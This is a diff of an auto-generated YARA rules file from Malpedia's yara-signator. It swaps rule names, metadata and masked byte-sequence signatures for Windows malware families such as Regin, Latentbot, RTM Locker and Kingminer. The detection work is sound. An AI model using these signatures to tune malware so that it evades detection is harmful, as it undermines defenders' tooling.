+		logic_hash = "6193315806789c46deee4d81d57339bc016356ef937c67c10ba9195e0e60ffaf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132185,34 +132800,34 @@ rule MALPEDIA_Win_Quickmute_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b7c2428 57 56 8bc3 e8???????? 6a04 }
-		$sequence_1 = { ff15???????? 8b4b54 6a04 6800100000 51 57 }
-		$sequence_2 = { 8d853cfdffff 56 50 ff15???????? 83c414 }
-		$sequence_3 = { 56 8d85f0feffff 33db 50 c785f0feffff6d737663 c785f4feffff72742e64 }
-		$sequence_4 = { c645fa6c 885dfb 66c745fc5700 750c }
-		$sequence_5 = { 66833c7731 57 0f94c1 888c353cffffff 46 }
-		$sequence_6 = { 46 ff15???????? 83c404 3bf0 72e2 8d55e4 52 }
-		$sequence_7 = { 51 8d9424e2030000 52 8d842466020000 }
-		$sequence_8 = { 7402 ffd0 8345e404 ebe6 c745e084914000 817de088914000 }
-		$sequence_9 = { c78542ffffff63746f72 66c78546ffffff7957 c68548ffffff00 750f }
+		$sequence_0 = { 6a03 53 6a03 8d8594fdffff 57 50 ff15???????? }
+		$sequence_1 = { 84c9 7412 8a5601 8aca 3a5701 750c }
+		$sequence_2 = { 85c0 7543 8a45ff be???????? fec0 8bce 50 }
+		$sequence_3 = { 53 50 56 89750c }
+		$sequence_4 = { a3???????? e8???????? 6a01 68???????? ff35???????? a3???????? }
+		$sequence_5 = { ebb6 8b02 0345fc eb02 }
+		$sequence_6 = { 50 e8???????? 83c40c 8945e4 8d45cc }
+		$sequence_7 = { 55 8bec 81ec10020000 53 8b5d08 8365f800 56 }
+		$sequence_8 = { 7533 8d8594fdffff 56 50 8d4594 50 }
+		$sequence_9 = { eb0a 33d2 8a1419 41 8d441201 8bd0 c1ea08 }
 
 	condition:
-		7 of them and filesize < 146432
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Sality_Auto : FILE
+rule MALPEDIA_Win_Regin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3651e4ed-4a90-502c-84b3-3270a294a585"
+		id = "a1cb1e4e-ea57-57da-8035-cea9e62b8eb8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sality_auto.yar#L1-L222"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.regin_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "9a7f5bbeaaf4328c45f3811719f9d62671822ec18ed1403a4d8c0d44848d8fbb"
+		logic_hash = "091fb04af94706b8fbe2a391afd54e9835ec0bf475e2ed1c52d68af6529e0a7e"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132224,46 +132839,32 @@ rule MALPEDIA_Win_Sality_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 8d85f4efffff 50 6a00 6a00 68???????? }
-		$sequence_1 = { 51 ff15???????? ba01000000 85d2 742e }
-		$sequence_2 = { 837d0804 0f8457020000 837d0803 0f844d020000 e8???????? 25ffff0000 33d2 }
-		$sequence_3 = { 51 ff15???????? c705????????00000000 8d9500f0ffff }
-		$sequence_4 = { 837d0804 0f84e9000000 8b551c 3b5520 }
-		$sequence_5 = { 51 ff15???????? c6850cebffff00 68???????? }
-		$sequence_6 = { 6a00 8d85f4feffff 50 8b8dd0fdffff }
-		$sequence_7 = { 0f8446010000 817d08a2000000 7517 e8???????? }
-		$sequence_8 = { ffe0 58 e9???????? 85c0 }
-		$sequence_9 = { 64ff30 8d8586134000 8920 896804 8d9dba114000 895808 646789260000 }
-		$sequence_10 = { 803fff 75e0 c3 ffb554134000 }
-		$sequence_11 = { c3 50 8d9578274000 52 50 }
-		$sequence_12 = { 03c7 8b00 0344240c eb02 33c0 64678f060000 }
-		$sequence_13 = { 750b 68c0270900 ff9503154000 6a00 }
-		$sequence_14 = { 50 ff954d144000 8d9533164000 52 }
-		$sequence_15 = { c9 c20800 fc b000 }
-		$sequence_16 = { 0fb70c753a174200 8bc6 40 0fb704453a174200 03c8 }
-		$sequence_17 = { ab a1???????? e8???????? c60720 47 50 }
-		$sequence_18 = { e8???????? a3???????? 833d????????00 7439 }
-		$sequence_19 = { 8b00 ebf4 83c008 03c3 5f 5e }
-		$sequence_20 = { 8d856cfeffff 50 a1???????? ff7038 e8???????? }
-		$sequence_21 = { c3 c8040000 53 56 }
-		$sequence_22 = { 56 6800200000 68ff000000 e8???????? }
-		$sequence_23 = { 58 ff30 e8???????? 68???????? e8???????? 0fb745d1 }
+		$sequence_0 = { 3ac3 7456 44 8b842498000000 8bd7 48 8bbc2488000000 }
+		$sequence_1 = { 0f84e8000000 33ff 33f6 8b0d???????? 3bf9 }
+		$sequence_2 = { 8d4804 e8???????? 85c0 751a 48 8b0d???????? 83caff }
+		$sequence_3 = { 7438 3de8000000 7431 b9f4010000 }
+		$sequence_4 = { 44 0f45f8 e8???????? 3ac3 7456 }
+		$sequence_5 = { e8???????? eb0b 44 3beb }
+		$sequence_6 = { 4c 8be7 48 8978c0 8978c8 48 }
+		$sequence_7 = { 897c2420 ff15???????? 48 3bc7 48 }
+		$sequence_8 = { 895c2440 e8???????? 3ac3 7434 48 }
+		$sequence_9 = { 750d 48 8d0dff000000 ff15???????? 48 8d152a030000 48 }
 
 	condition:
-		7 of them and filesize < 1523712
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Concealment_Troy_Auto : FILE
+rule MALPEDIA_Win_Latentbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f25da06b-e34f-5ec3-afca-981eed54a3f2"
+		id = "6a00a894-4935-5534-b5e9-c8d6ecaeaacd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.concealment_troy_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.latentbot_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "5ef8bd4e1cd35f7f8cc8bada75a137689ed8949f72f34f8e30aca42d1738a1ce"
+		logic_hash = "0b0eb24e4417089c175072116bffcac1a7119a8a9d763a31cda53b89f6d3beef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132277,32 +132878,32 @@ rule MALPEDIA_Win_Concealment_Troy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bc2 50 8d942468050000 52 }
-		$sequence_1 = { 83c410 8d542424 52 8d442438 50 6a00 6a00 }
-		$sequence_2 = { 8bc8 83e103 f3a4 8d542418 8d8c2430090000 e8???????? 85c0 }
-		$sequence_3 = { 8d3c8da0774100 8b0f c1e606 833c0eff }
-		$sequence_4 = { 6800100000 8d84249c030000 6a00 50 e8???????? }
-		$sequence_5 = { 8d842420010000 e8???????? 8d542418 8d9b00000000 8a08 }
-		$sequence_6 = { 8b7588 8b7d8c b940000000 f3a5 }
-		$sequence_7 = { 3acb 75f9 2bc2 807c041722 }
-		$sequence_8 = { e8???????? 83c414 807c24104d 0f85b1000000 807c24115a 0f85a6000000 53 }
-		$sequence_9 = { 57 ff15???????? 5d 5f 33c0 5e 8b8c2420010000 }
+		$sequence_0 = { 51 6aff ff36 895dfc ffd0 85c0 7d13 }
+		$sequence_1 = { c3 e8???????? 85c0 740c c7460802000000 e8???????? 33c0 }
+		$sequence_2 = { ff742410 ff742410 e8???????? c20800 55 8bec 51 }
+		$sequence_3 = { c3 55 8bec 83ec24 b874657874 8945e4 8945dc }
+		$sequence_4 = { 59 59 33c0 c3 55 8bec 83ec38 }
+		$sequence_5 = { 83c418 eb02 33ff 57 6aff ff542418 5f }
+		$sequence_6 = { 53 55 56 57 8b790c 8b770c }
+		$sequence_7 = { 8945dc 64a118000000 8b4030 53 8b5808 8b433c }
+		$sequence_8 = { ffd0 4c 8b542468 45 33c9 45 33c0 }
+		$sequence_9 = { 57 53 894da8 ffd6 8bf0 83fe01 7569 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Zerot_Auto : FILE
+rule MALPEDIA_Win_Voidoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ca921115-39c5-5d82-8694-1a7256cdc82c"
+		id = "92ea84a1-8606-53ec-b061-29e92893f1a1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zerot_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voidoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.voidoor_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "85e45f7b3fe13ccc106bda70bf9add1f5b39cb8a82aaafbc3111d2a319c8d43b"
+		logic_hash = "c7810f3b0438aab57f906bea825e4f8545638ef9f814f76d8e4defd0ecb553e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132316,34 +132917,34 @@ rule MALPEDIA_Win_Zerot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d3c1b 33c9 85ff 7e50 83c202 660f1f440000 8b460c }
-		$sequence_1 = { 8d4f01 895518 8a07 47 84c0 75f9 6800010000 }
-		$sequence_2 = { ffd6 8b8d74f6ffff 41 03c1 }
-		$sequence_3 = { 6aff 8d8554ffffff 50 6a00 6a00 }
-		$sequence_4 = { 880432 8a57fb c0e202 02d0 8b45e8 }
-		$sequence_5 = { c7458401000000 33c0 66894588 8d459c 50 }
-		$sequence_6 = { bb06000000 50 8d8594feffff 50 }
-		$sequence_7 = { 740c 81bdecf9ffffc8000000 7421 8b85e8f9ffff }
-		$sequence_8 = { 85c0 755e ff15???????? 8d857cffffff 50 ffd6 }
-		$sequence_9 = { 0f1f440000 8b460c 8a44082a 2401 88040a }
+		$sequence_0 = { e9???????? 8d4db8 e9???????? 8d8d70ffffff e9???????? 8d8d40ffffff e9???????? }
+		$sequence_1 = { ffb6d80b0000 ffb6a0090000 68???????? e8???????? 83c40c 85c0 74a5 }
+		$sequence_2 = { 5b 8b4c241c 33cc e8???????? 83c420 c3 8b7e04 }
+		$sequence_3 = { c744242801000000 8dbbbc000000 6a40 8d442424 50 6a02 ff742420 }
+		$sequence_4 = { ff30 ff15???????? 8b4308 83c41c c70000000000 33c0 81fd00030980 }
+		$sequence_5 = { b90b000000 f3a5 8d836c010000 50 8d833c010000 50 ff742418 }
+		$sequence_6 = { ff5018 eb07 8bce e8???????? 8b4de8 8bd8 895de4 }
+		$sequence_7 = { c70016000000 e8???????? 83c8ff 0bd0 eb35 e8???????? 85c0 }
+		$sequence_8 = { e8???????? 8bf0 83c404 85f6 7508 8d7001 e9???????? }
+		$sequence_9 = { e8???????? 6a00 32d2 8d4db4 c645fc08 e8???????? 83c434 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 1744896
 }
-rule MALPEDIA_Win_Winnti_Auto : FILE
+rule MALPEDIA_Win_Rtm_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8877d2db-c061-5f0c-9030-9148176d6e19"
+		id = "0ddce877-c810-52c5-9bdb-6bdd5bdc33c5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.winnti_auto.yar#L1-L239"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rtm_locker_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "17da510395f95f1363bc518ade4bb0caf94e359f90bb002c059a140da569d4ec"
+		logic_hash = "368fcfca2d19a0bfd2fafa00b39d1c6b06c40ca85cdf8b686f8ad87f29bc5ebf"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132355,46 +132956,32 @@ rule MALPEDIA_Win_Winnti_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c408 e9???????? 8b44241c 8bce 50 e8???????? }
-		$sequence_1 = { 8b0d???????? 85c9 746f 8b0d???????? 85c9 }
-		$sequence_2 = { 50 e8???????? 83c404 c7430c00000000 83c8ff }
-		$sequence_3 = { f7d1 49 81f904010000 0f83e9010000 53 }
-		$sequence_4 = { 3d10a00000 0f8ff4010000 0f84e2010000 051f60ffff 83f82e 0f8700010000 33d2 }
-		$sequence_5 = { 8d4c2413 c1e206 51 6a02 }
-		$sequence_6 = { 3c02 7519 8b4c2430 8b442424 8d53ec }
-		$sequence_7 = { e8???????? 85c0 7e24 8b54241c 83c201 83d700 }
-		$sequence_8 = { 72e2 eb04 8b6c1f02 488b742460 4863cd 8bd7 }
-		$sequence_9 = { 488bc7 4c8d9c24d0000000 498b5b20 498b7328 498be3 415f }
-		$sequence_10 = { ff15???????? 488d15af4b0100 488bcb 488905???????? ff15???????? 488d15884b0100 }
-		$sequence_11 = { 488d0d33f1ffff 4885c0 7422 8930 488d7808 }
-		$sequence_12 = { e8???????? 488bd8 488d05d03b0100 4885db 488d4f38 480f44d8 488bd3 }
-		$sequence_13 = { 4533c0 488bc8 488bd3 ff15???????? 4d85ff }
-		$sequence_14 = { eb02 33ff 488bd7 488d4d9f e8???????? }
-		$sequence_15 = { 4533db 488d2d7d1c0000 8b7320 448b7324 }
-		$sequence_16 = { 4889842400020000 8b4108 4c8bc2 4533c9 41894004 4889542420 33d2 }
-		$sequence_17 = { 4c8d25b6f10000 498b0c24 4d8bc5 488bd3 e8???????? }
-		$sequence_18 = { 488b8d00010000 ff15???????? 90 488d8d80000000 ff15???????? 90 }
-		$sequence_19 = { 4c8bc0 488d155d520100 488bcb e8???????? 48837d0f10 7209 }
-		$sequence_20 = { 41c6400701 eb0f 4080fe05 7509 41800880 41c6400704 410fb64807 }
-		$sequence_21 = { 7409 90 48ffc0 403830 }
-		$sequence_22 = { 83feff 7423 83fefe 741e 488bce 488bc6 488d15f8ba0a00 }
-		$sequence_23 = { 488bb5c8030000 448bc0 4585c0 0f84ca000000 }
+		$sequence_0 = { c1fe06 e8???????? 59 83e03f 59 6bc838 8b04b5500f4200 }
+		$sequence_1 = { ff15???????? 8b1d???????? 89442410 85f6 }
+		$sequence_2 = { 8945e4 03c6 8945d0 33c7 8b75ec c1c007 8945f8 }
+		$sequence_3 = { 33ff 3bf0 7711 8d8550ffffff 8945d8 8d463c 3b45d8 }
+		$sequence_4 = { 0f28cb 8344242810 660f62d0 660f6ae0 0f104630 89542420 }
+		$sequence_5 = { 660fefc8 0f104220 0f1149d1 0f104e20 660fefc8 0f104230 0f1149e1 }
+		$sequence_6 = { 23cb c1fe1f 8b5dd0 23ce 8b75e8 }
+		$sequence_7 = { 50 ffd6 833d????????00 8b3d???????? 7442 6a00 8d442414 }
+		$sequence_8 = { 68???????? 57 ff15???????? 8d85a0fdffff }
+		$sequence_9 = { 0f108570feffff 0f118508ffffff e8???????? 8d8d30feffff e8???????? 8d8d30feffff e8???????? }
 
 	condition:
-		7 of them and filesize < 1581056
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Hotcroissant_Auto : FILE
+rule MALPEDIA_Win_Anchormtea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "041c170b-cb82-5079-a120-00d45f6cb95f"
+		id = "75878680-af6e-531f-abbe-374c7f6b18e7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hotcroissant_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.anchormtea_auto.yar#L1-L152"
 		license_url = "N/A"
-		logic_hash = "9f9dd22a171d10237a5cfe7e750b40557b2e5ee36c0e5da30f363ab0cd99d478"
+		logic_hash = "b646f5ea9da3552482b100437224e4af5475bebe8d62d4511d1baeeadc61942b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132408,32 +132995,37 @@ rule MALPEDIA_Win_Hotcroissant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7409 6a01 50 ff15???????? 68???????? }
-		$sequence_1 = { 68703a0000 8d958cc5ffff 52 50 }
-		$sequence_2 = { 33c0 52 a3???????? a3???????? a3???????? a3???????? }
-		$sequence_3 = { 33ff 3bc7 7473 56 }
-		$sequence_4 = { 7409 6a01 50 ff15???????? 68???????? }
-		$sequence_5 = { c1e808 46 0bc7 8955fc 3b750c }
-		$sequence_6 = { 8b7d08 8a1c3e 32da 32d8 32d9 881c3e 8ad8 }
-		$sequence_7 = { 7473 56 6a01 50 }
-		$sequence_8 = { a3???????? a3???????? ffd6 a1???????? 50 ffd6 }
-		$sequence_9 = { a3???????? a3???????? a3???????? ffd6 a1???????? 50 }
+		$sequence_0 = { e9???????? f7d8 1bc0 83e002 }
+		$sequence_1 = { 83c40c 6808020000 6a40 ffd6 }
+		$sequence_2 = { bb01000000 8910 eb02 33db 85f6 }
+		$sequence_3 = { 7512 488d056aaf0100 483bc8 7406 e8???????? }
+		$sequence_4 = { 8b4508 57 8945d0 8d45c8 57 50 }
+		$sequence_5 = { c68524f7ffff00 8d8d98f7ffff ffb524f7ffff 52 }
+		$sequence_6 = { 41397e24 0f86ee010000 6666660f1f840000000000 4d8bc5 33d2 }
+		$sequence_7 = { 488b4b48 4885c9 740a ff15???????? 48897b48 }
+		$sequence_8 = { 488bcb e8???????? 488bcb ff15???????? 4885f6 7419 }
+		$sequence_9 = { 3bc1 0f44d9 85f6 7407 56 }
+		$sequence_10 = { 6f 4b 0010 6f 4b 0010 }
+		$sequence_11 = { 488d4808 488d15c2180200 e8???????? 85c0 }
+		$sequence_12 = { b801000000 488bbc24f0080000 488bb42420090000 488bac2418090000 }
+		$sequence_13 = { 488bcf 4c8bc3 4c2bc7 6690 }
+		$sequence_14 = { 898534ffffff 7202 8b12 8bc2 8d7002 660f1f440000 }
 
 	condition:
-		7 of them and filesize < 591872
+		7 of them and filesize < 839680
 }
-rule MALPEDIA_Win_Catb_Auto : FILE
+rule MALPEDIA_Win_Minibike_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7782ecd0-01e3-5ca1-93ff-bd4a61ae70c3"
+		id = "64fb33a7-6775-549a-bd66-e303dd414aa4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.catb_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibike"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.minibike_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "49ea54be47b78595def43aa15eb04fc0e876132d1319a21babeae83d5fcf1c52"
+		logic_hash = "bd38364b90ab98904e008cf661267157cc33bb2a7b72870b77767ef9d697acf9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132447,32 +133039,32 @@ rule MALPEDIA_Win_Catb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f2805???????? 48898530020000 488d442468 4889442448 }
-		$sequence_1 = { 83f801 751c 488b4530 488b8888000000 488d05aa0f0100 }
-		$sequence_2 = { 418be9 48c1f806 488d0d14e40300 4183e23f 4903e8 498bf0 }
-		$sequence_3 = { 4183f90f 7779 428b8c8e38c80000 4803ce ffe1 660f73fa01 eb65 }
-		$sequence_4 = { 48ffc7 803f20 74f8 be05000000 488d151d9f0000 448bc6 488bcf }
-		$sequence_5 = { 7832 3b0d???????? 732a 4863c9 4c8d05e89f0300 488bc1 }
-		$sequence_6 = { 48ffcb ffc2 0fb603 4280bc087098010000 74e3 440fb603 }
-		$sequence_7 = { 7326 4863c9 488d15a49d0300 488bc1 83e13f }
-		$sequence_8 = { 4983ceff 33db 4c8d25e8a10300 895c2420 }
-		$sequence_9 = { 44895c2448 81fae9fd0000 0f8570010000 4c8d3d23aaffff 418bd3 }
+		$sequence_0 = { 8b7ffc 83c123 2bc7 83c0fc 83f81f 0f8741040000 }
+		$sequence_1 = { e8???????? 83c408 0f2805???????? 33c9 0f1145b8 c745c8201b233e 66c745cc2700 }
+		$sequence_2 = { 0f57c0 50 660fd685b0feffff 0f2805???????? 51 8d8db0feffff 0f1185d0fcffff }
+		$sequence_3 = { 8b4df4 b867666666 8b1b 83c404 8b4908 2bcb }
+		$sequence_4 = { 898df4fcffff 89b5f0fcffff 8985f8fcffff 85c0 7445 8bb5a4fdffff 8b95f0fcffff }
+		$sequence_5 = { c745d400000000 8d45c0 660fd645cc 0f2805???????? 50 51 8d4dcc }
+		$sequence_6 = { 8d8588fdffff 660fd685e4fdffff 0f2805???????? 50 51 8d8de4fdffff c78584fdffff05000000 }
+		$sequence_7 = { 743a 8b85d8fdffff 2bc7 c1f802 8d0c8500000000 8bc7 81f900100000 }
+		$sequence_8 = { 33c9 c745b00b0c0716 c745b44c060e0e c645b800 90 8d45ad 301408 }
+		$sequence_9 = { e8???????? 8bce e8???????? 8bf0 e9???????? 6a02 33c0 }
 
 	condition:
-		7 of them and filesize < 593920
+		7 of them and filesize < 574464
 }
-rule MALPEDIA_Win_Unidentified_070_Auto : FILE
+rule MALPEDIA_Win_Netkey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2ac6d19-ae7e-5108-ae59-9789ab0e339d"
+		id = "a13a2f78-42fb-5eb6-88d7-3a64826b180e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_070_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netkey_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "45a52b7bdbd7641f0d504c35a74291eb016539e938091cf460316e51b8b9d79b"
+		logic_hash = "11cc566a64ecf8a198c36c98aeaff38f948208170139e520619905a90909c22c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132486,32 +133078,32 @@ rule MALPEDIA_Win_Unidentified_070_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 6a04 50 ff15???????? 8945fc }
-		$sequence_1 = { 6a00 6a00 6a00 6a04 50 ff15???????? 8945fc }
-		$sequence_2 = { 6a00 6a00 6a04 50 ff15???????? 8945fc 85c0 }
-		$sequence_3 = { 6a04 50 ff15???????? 8945fc 85c0 }
-		$sequence_4 = { 6a00 6a04 50 ff15???????? 8945fc 85c0 }
-		$sequence_5 = { 6a00 6a04 50 ff15???????? 8945fc }
-		$sequence_6 = { 33c0 c20400 3b0d???????? 7502 }
-		$sequence_7 = { 85db 0f84af000000 6a00 6a00 }
-		$sequence_8 = { 742d 68???????? 57 ffd6 a3???????? 85c0 741c }
-		$sequence_9 = { 6808020000 8d8424d4020000 6a00 50 e8???????? }
+		$sequence_0 = { 6a00 50 8b4604 038528fdffff 50 8b46fc 038524fdffff }
+		$sequence_1 = { f30f7e05???????? 660fd6444e10 a1???????? 89444e18 ff15???????? 8bd8 85db }
+		$sequence_2 = { 8945f8 53 56 57 8bf9 8995e0feffff 83ffff }
+		$sequence_3 = { b802000000 53 668945d8 ff15???????? 8b3d???????? 668945da }
+		$sequence_4 = { 57 33c0 8d3c9d241d4400 f00fb10f 8bc8 85c9 }
+		$sequence_5 = { 8985dcfdffff 8b85ecfdffff 6a10 8985e0fdffff 8d85d8fdffff 50 6a00 }
+		$sequence_6 = { 2bca 51 57 8d4b18 e8???????? 57 }
+		$sequence_7 = { 750b 8a45fb 88043e 46 }
+		$sequence_8 = { 83c0fc 50 e8???????? 8b8db4efffff }
+		$sequence_9 = { e8???????? 83c404 8d85f0efffff 50 6800040000 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 606208
 }
-rule MALPEDIA_Win_Bouncer_Auto : FILE
+rule MALPEDIA_Win_Rokku_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5fe05fe3-5ba6-5402-bae1-03809aced05d"
+		id = "715ad7bc-d28a-5156-87eb-1255d9ce2084"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bouncer_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rokku_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "ffbe1b49339388f6599ff4eb536b18862d27897734fc35260ae1ce6cc8930ed7"
+		logic_hash = "1d23d8f4257081bb086c98f92ac75f2d433e54c9fb6c0c1b7b21d511b54ccc0a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132525,32 +133117,32 @@ rule MALPEDIA_Win_Bouncer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 3bc3 0f84dd060000 8b4de4 }
-		$sequence_1 = { ff30 ff15???????? 39750c 50 }
-		$sequence_2 = { 50 8d8584fdffff 50 ff760c ff15???????? 85c0 }
-		$sequence_3 = { bfc8000000 8d8534ffffff 57 50 ff36 }
-		$sequence_4 = { e9???????? 80f912 7533 6a08 6a08 ff15???????? 50 }
-		$sequence_5 = { 57 8b30 56 e8???????? 8b3d???????? 59 bbc8000000 }
-		$sequence_6 = { 03c7 50 ff7508 e8???????? 83f8ff 0f8406010000 }
-		$sequence_7 = { a1???????? 8b3d???????? 3bc6 7404 50 ffd7 59 }
-		$sequence_8 = { 8945ec 8d45f0 c745ac44000000 50 8d45ac 50 56 }
-		$sequence_9 = { 8b8485a064ffff 3b45cc 0f8cbe090000 40 8945cc e9???????? 80f902 }
+		$sequence_0 = { 750b 3944242c 7523 b805000080 3d06000080 7517 57 }
+		$sequence_1 = { 66c745fd5352 885dff 80441de5fa 43 83fb1a 72f5 }
+		$sequence_2 = { 8bce e8???????? 0f2805???????? 8bcb 0f1145cf }
+		$sequence_3 = { 01442414 13ea 8b542414 8bca 81c100000002 83d500 }
+		$sequence_4 = { 8bc7 894a0c 8b4c241c 0fa4c11a 8b4c2410 c1e01a 2bc8 }
+		$sequence_5 = { 13da f76c2460 03f8 8b44242c }
+		$sequence_6 = { 8d84244c080000 53 50 e8???????? be00080000 8d442454 56 }
+		$sequence_7 = { 75f7 c60607 46 83ed01 75f7 6a08 8d442434 }
+		$sequence_8 = { c645ff00 885dfe 8d55e0 33db c645fd27 50 885dff }
+		$sequence_9 = { e8???????? b935010000 b8???????? 03c1 51 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Bart_Auto : FILE
+rule MALPEDIA_Win_Kingminer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "47f2dba4-1ef6-5808-90b4-0ef4438e03a3"
+		id = "d7cd7a0a-31ee-53e1-af0c-e4bec9eb4a6f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
